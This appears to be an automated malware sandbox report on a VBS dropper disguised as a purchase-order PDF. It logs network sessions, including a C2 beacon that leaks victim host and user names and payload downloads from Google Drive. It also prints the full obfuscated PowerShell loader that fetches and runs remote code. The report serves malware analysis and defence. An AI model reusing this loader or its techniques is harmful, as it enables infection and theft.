                                      Date: Tue, 01 Oct 2024 05:44:57 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:59.701963902 CEST224IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:59.701973915 CEST1236IN
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:59.702009916 CEST142IN
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.549748137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:59.842614889 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:59.847503901 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:45:02.415518045 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:45:00 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549704142.250.184.2384435972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-01 05:42:59 UTC215OUTGET /uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:43:00 UTC1610INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 01 Oct 2024 05:43:00 GMT
                                      Location: https://drive.usercontent.google.com/download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Cross-Origin-Opener-Policy: same-origin
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Content-Security-Policy: script-src 'nonce-ETYwi3GcMZSYJGiq3zM3iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549705142.250.184.1934435972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-01 05:43:00 UTC233OUTGET /download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:43:03 UTC4863INHTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Content-Security-Policy: sandbox
                                      Content-Security-Policy: default-src 'none'
                                      Content-Security-Policy: frame-ancestors 'none'
                                      X-Content-Security-Policy: sandbox
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Resource-Policy: same-site
                                      X-Content-Type-Options: nosniff
                                      Content-Disposition: attachment; filename="Lovovertrdelsernes.java"
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                      Accept-Ranges: bytes
                                      Content-Length: 461600
                                      Last-Modified: Mon, 30 Sep 2024 15:41:27 GMT
                                      X-GUploader-UploadID: AD-8ljtQdqFGMWAg1wXg0iqct37r38m91EeDng55iluWvO1XGukXmZgmBw8IzQ3JwGf-n7QBA21nbacpKA
                                      Date: Tue, 01 Oct 2024 05:43:03 GMT
                                      Expires: Tue, 01 Oct 2024 05:43:03 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=5a6jEw==
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close
                                      Data Ascii: 1PDG+0df8CN8mCSMV49dP6ES81st4PqrX3anB2HzZZz7FMQ4VWjZz3TIsPM3oAN6DojAg0PRvf9ehDp9UQnnfmUt+NPTlzz7danqA/T2yNs5fAo/PYiJ23WgnWLQJZniz/awfmUtiX+x6rI4apG9/1EJvf9RCb3/UQm9/1EJvf9RCb3/Y+WLxuSY2xY8J66LZdU0QjgLvf/uhOXL2sXOsJbEFM/QCGxXMqH2GxH3XLks2C+Ace4QyS84lZvcIDp
                                      2024-10-01 05:43:03 UTC1390INData Raw: 64 6c 44 49 54 37 34 6b 36 43 49 48 56 51 43 62 30 58 6c 33 71 35 2f 77 61 32 7a 33 53 39 4a 44 77 49 54 43 68 49 73 4e 44 4f 44 39 79 32 6c 44 54 67 45 63 6a 41 33 4f 72 56 50 55 72 50 7a 63 4a 2f 69 41 32 39 42 58 67 51 30 4d 6b 44 2b 46 4c 2b 62 2f 79 54 45 73 74 4a 7a 79 7a 70 53 75 4b 70 37 30 32 41 62 44 32 49 55 38 4c 4f 35 49 64 2b 76 77 6c 61 55 48 43 49 65 77 59 59 41 30 32 75 7a 59 42 63 2f 6d 43 55 32 38 61 68 65 71 61 70 70 41 64 53 63 6e 75 76 70 64 7a 71 32 35 4a 37 42 47 4d 32 49 43 34 75 42 68 62 46 41 76 33 41 72 76 33 77 6e 53 5a 6e 64 41 34 46 61 54 6b 43 43 44 58 49 6f 51 4f 7a 57 79 33 77 46 7a 77 4e 68 50 5a 46 61 39 44 37 65 6a 77 49 67 7a 54 74 42 78 4a 69 62 73 6a 48 5a 62 4f 47 68 69 31 63 4b 62 6f 6c 74 33 51 2f 30 77 34 43 56
                                      Data Ascii: dlDIT74k6CIHVQCb0Xl3q5/wa2z3S9JDwITChIsNDOD9y2lDTgEcjA3OrVPUrPzcJ/iA29BXgQ0MkD+FL+b/yTEstJzyzpSuKp702AbD2IU8LO5Id+vwlaUHCIewYYA02uzYBc/mCU28aheqappAdScnuvpdzq25J7BGM2IC4uBhbFAv3Arv3wnSZndA4FaTkCCDXIoQOzWy3wFzwNhPZFa9D7ejwIgzTtBxJibsjHZbOGhi1cKbolt3Q/0w4CV
                                      2024-10-01 05:43:03 UTC1390INData Raw: 63 33 51 34 4a 6f 68 4f 49 2f 48 43 46 6e 36 36 34 71 6b 64 6d 6f 68 2b 41 31 32 65 6b 61 33 4e 67 46 2f 2b 53 35 51 34 4c 69 49 46 73 45 39 4d 65 72 50 64 52 69 33 6b 7a 65 69 74 7a 58 66 42 6c 58 68 59 6a 58 59 4e 4e 4e 42 6b 6a 2b 56 44 43 2f 32 75 6d 33 33 54 70 30 39 32 4b 59 31 70 32 4f 64 37 69 46 4b 47 65 6b 51 4c 76 66 39 65 68 4a 37 37 55 51 6d 79 4f 47 65 59 76 66 39 52 43 62 33 2f 55 51 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 55 51 6d 39 2f 33 72 7a 33 74 47 2b 65 62 32 70 70 36 6b 4e 73 65 37 68 74 63 51 43 35 30 49 74 41 4e 7a 73 6c 79 2f 37 55 6f 58 51 4a 5a 6d 7a 76 75 47 6f 71 65 39 53 5a 51 34 49 69 46 4e 61 4c 58 54 52 66 70 64 44 47 48 52 44 57 43 46 32 73 41 43 4d 59 6a 63 77 62 34 70 4d 4e 64 49 2f 62 32 6f 52 49 39 58 49 6c 70 53
                                      Data Ascii: c3Q4JohOI/HCFn664qkdmoh+A12eka3NgF/+S5Q4LiIFsE9MerPdRi3kzeitzXfBlXhYjXYNNNBkj+VDC/2um33Tp092KY1p2Od7iFKGekQLvf9ehJ77UQmyOGeYvf9RCb3/UQm9/1EJvf9RCb3/UQm9/3rz3tG+eb2pp6kNse7htcQC50ItANzsly/7UoXQJZmzvuGoqe9SZQ4IiFNaLXTRfpdDGHRDWCF2sACMYjcwb4pMNdI/b2oRI9XIlpS
                                      2024-10-01 05:43:03 UTC1390INData Raw: 6e 55 79 73 72 6f 71 78 79 34 50 35 70 6a 50 56 32 72 75 47 41 63 52 32 46 34 45 6d 2f 49 62 6c 62 50 36 2f 6d 42 59 7a 4e 69 56 4d 42 30 35 48 46 4a 47 66 67 76 67 57 43 46 43 41 36 4d 64 36 46 38 54 68 76 4f 34 31 38 44 45 42 50 35 69 58 36 6e 68 75 71 75 37 34 68 54 71 48 65 70 4e 33 5a 48 34 36 73 6b 61 71 30 47 77 44 75 69 49 57 7a 6b 57 49 67 73 7a 47 37 4f 53 69 61 42 45 2f 51 35 44 65 39 65 44 56 64 2f 39 31 47 43 36 4e 75 35 42 43 6a 37 55 59 44 74 2b 39 70 45 6f 55 57 71 62 76 72 68 75 59 4c 6d 2b 31 48 46 49 6d 41 48 52 35 47 64 38 4d 78 66 37 43 71 4b 74 4b 45 6f 32 68 71 6e 43 33 4c 36 54 2b 75 2f 77 38 50 2b 2b 49 30 66 78 6a 46 37 65 39 46 68 38 48 62 73 55 72 2f 2f 55 56 6f 47 38 44 4f 74 6f 33 36 69 32 64 4a 64 37 49 68 2b 61 56 36 66 35
                                      Data Ascii: nUysroqxy4P5pjPV2ruGAcR2F4Em/IblbP6/mBYzNiVMB05HFJGfgvgWCFCA6Md6F8ThvO418DEBP5iX6nhuqu74hTqHepN3ZH46skaq0GwDuiIWzkWIgszG7OSiaBE/Q5De9eDVd/91GC6Nu5BCj7UYDt+9pEoUWqbvrhuYLm+1HFImAHR5Gd8Mxf7CqKtKEo2hqnC3L6T+u/w8P++I0fxjF7e9Fh8HbsUr//UVoG8DOto36i2dJd7Ih+aV6f5
                                      2024-10-01 05:43:03 UTC1390INData Raw: 32 49 4e 6c 6c 59 5a 77 50 55 63 70 2b 35 53 69 6f 56 72 6b 6e 31 57 36 4d 77 78 58 46 47 32 54 44 57 4b 6f 6f 63 30 31 46 32 73 44 73 41 68 62 42 31 6f 63 52 69 5a 2b 6f 30 66 69 4b 32 4f 49 54 38 66 31 4a 47 74 2b 6f 33 4f 67 53 53 36 41 6a 77 69 6a 47 38 31 38 69 46 45 66 4a 79 4c 79 51 31 56 58 6b 79 56 4e 6f 68 67 6e 59 6f 30 6d 63 38 74 4e 6e 57 41 5a 51 58 4a 65 39 33 6e 35 2f 73 6f 36 54 42 46 34 38 6a 6c 56 70 64 70 45 6f 55 56 73 4a 42 63 63 75 59 72 71 2b 31 46 61 42 68 74 79 72 35 56 2b 6f 68 71 69 48 53 69 49 66 76 61 56 73 68 4f 70 7a 59 42 62 2f 6b 2b 55 68 41 34 74 4b 6c 65 30 74 63 30 76 49 77 69 57 2b 6a 67 35 6f 59 67 4a 6c 53 51 5a 51 42 42 74 63 5a 37 37 68 34 44 45 76 47 77 58 44 62 67 38 73 31 35 63 30 38 65 5a 31 4e 76 6a 65 70 42
                                      Data Ascii: 2INllYZwPUcp+5SioVrkn1W6MwxXFG2TDWKooc01F2sDsAhbB1ocRiZ+o0fiK2OIT8f1JGt+o3OgSS6AjwijG818iFEfJyLyQ1VXkyVNohgnYo0mc8tNnWAZQXJe93n5/so6TBF48jlVpdpEoUVsJBccuYrq+1FaBhtyr5V+ohqiHSiIfvaVshOpzYBb/k+UhA4tKle0tc0vIwiW+jg5oYgJlSQZQBBtcZ77h4DEvGwXDbg8s15c08eZ1NvjepB


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.5 | 49714 | 142.250.184.238 | 443 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-10-01 05:43:29 UTC | 216 | OUT | GET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      2024-10-01 05:43:30 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 01 Oct 2024 05:43:29 GMT
                                      Location: https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Content-Security-Policy: script-src 'nonce-7RGCKwi8ZZiZef2kQj1jng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Cross-Origin-Opener-Policy: same-origin
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      3 | 192.168.2.5 | 49715 | 142.250.184.193 | 443 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-10-01 05:43:30 UTC | 258 | OUT | GET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:43:33 UTC | 4859 | IN | HTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Content-Security-Policy: sandbox
                                      Content-Security-Policy: default-src 'none'
                                      Content-Security-Policy: frame-ancestors 'none'
                                      X-Content-Security-Policy: sandbox
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Resource-Policy: same-site
                                      X-Content-Type-Options: nosniff
                                      Content-Disposition: attachment; filename="sLgRDOfJZMJPu27.bin"
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                      Accept-Ranges: bytes
                                      Content-Length: 106560
                                      Last-Modified: Mon, 30 Sep 2024 03:50:27 GMT
                                      X-GUploader-UploadID: AD-8ljs8LNtVlCl38hmDctzdQXjopGoXcFXuD6upukhqf9JpbgqzXPTrB8NFTRnk7KmKcr3gaqaLPji9LA
                                      Date: Tue, 01 Oct 2024 05:43:33 GMT
                                      Expires: Tue, 01 Oct 2024 05:43:33 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=p83L0w==
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Target ID:0
                                      Start time:01:42:50
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs"
                                      Imagebase:0x7ff75dce0000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:01:42:53
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? 
DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts ,all1Plad 2 sovs ');$Coadjuvant=$Knaldende[0];$Manius=(Stratocumulus 'Teena$ ind gIn ralIrrelOp.escB He mA EtioLJuece:R sikr Op aeTilluvVejskiCreagS BodeoColporIchthS Forl=UrtesnThefteChr mw Impu-S.ussoSlattbchookjUnderEHeretCSpidst all AgorsNon,rySpiseSRetirtCatchEAgnelmFilm,.AselanDutteeFo sttA tik. 
vampWSuperE BaghB KondCC nniLtele I TrkneI dkbnH perT Pelu ');Romancerne ($Manius);Romancerne (Stratocumulus ' angb$DimenR PrioeSigvav OptaiOpiops CitrobundprMachisUnfra.TekstH FlareRadiaaBrod.dV.rtueSeptorRotansMonst[Torso$FortaRSubtreDiscadAntiaaEncork UgektgrammiAdmonoAntednInte eNskesr SkarnPauseeudjaesEnam.]Ronni=omkla$ Me lTColore ivinrTor,hmFormioReak.mPro oeToba tNataleEtmaarGunl,e AmphtLap o ');$Controvert=Stratocumulus ' Nont$UnfriRMilite InstvRe,triO erssdext oDataerChangsReent.AnkylDTils oBrikewSilvan verhlFemteoBiparaSibildArb,jF U dei BflelWakekezooma(odont$StrknCVilfroBranda SkoldPreofjSpex u ikrv edlgan nignBissatl,sti,Frigi$DeviaaV.rboc.iltmo uperl Staao Dds gDull,yUtilb)Contr ';$acology=$Luksusvrelserne;Romancerne (Stratocumulus ' Aiga$StenvG PerclBesmioHder,BOp inA,nowcLSed m: FortpSme,trTeetiElungys T maCSkol,o,osprUIldsltCo fl=Vind (FernytPanorESkabmsC.elatAfdra-Lion pCorecaShtgoTNsk.rH Fe r este$Dro ea Anthc EgenO Pr,dlDestrOCove g HjneYTillb)C art ');while (!$prescout) {Romancerne (Stratocumulus 'Exsec$GobligJordtlSpec oPrincbCons aNyttelFrdse:Unkn kHyperoReg rm Di tpDolmaoTzolkn isbeeUnd rrLychee upersSwobb=wissi$LimintTill r OutsuAktioedivis ') ;Romancerne $Controvert;Romancerne (Stratocumulus 'pikemSReacttUr oma HandrBav etK,age- .tenSCachilCurbseSem.peuppilpFinge nexa4 Bota ');Romancerne (Stratocumulus 'Svars$Sud eg cephlG.aato HanebSa,meaSc.tul Frem:TraumpTablorHa mleFragmsDraw cHelseoUnferuRedcotMidda=Givab(,amplTN,nemeScytosKlaustImmor- P roP BuffaKommutUnpr,hUnsol Skum$QuickaNotomcP denoSynnvlst,ejohovedgDistoyArkip)Hand ') ;Romancerne (Stratocumulus 'Bugal$UudtmgBattllHindeo Ardub Ti laBoxinlTa kl:GrundRFyrr y S jutGritttSte,deE near Kvins UtchkSlaaeeInte sMidga= skad$Bort g By.tlSnur o Svagb.adroa jugulEx er:AandsFFloateAst,olOtocrtmanwiaGebrdrGruttbKomple H stjLapard phoveUncrar Magnn iffeeHel rs Meds+Falds+Tvege%Fejlr$havf KSchilnNarcoa nhealG vnldUnd reTond nShee,dRombeeKlokk. 
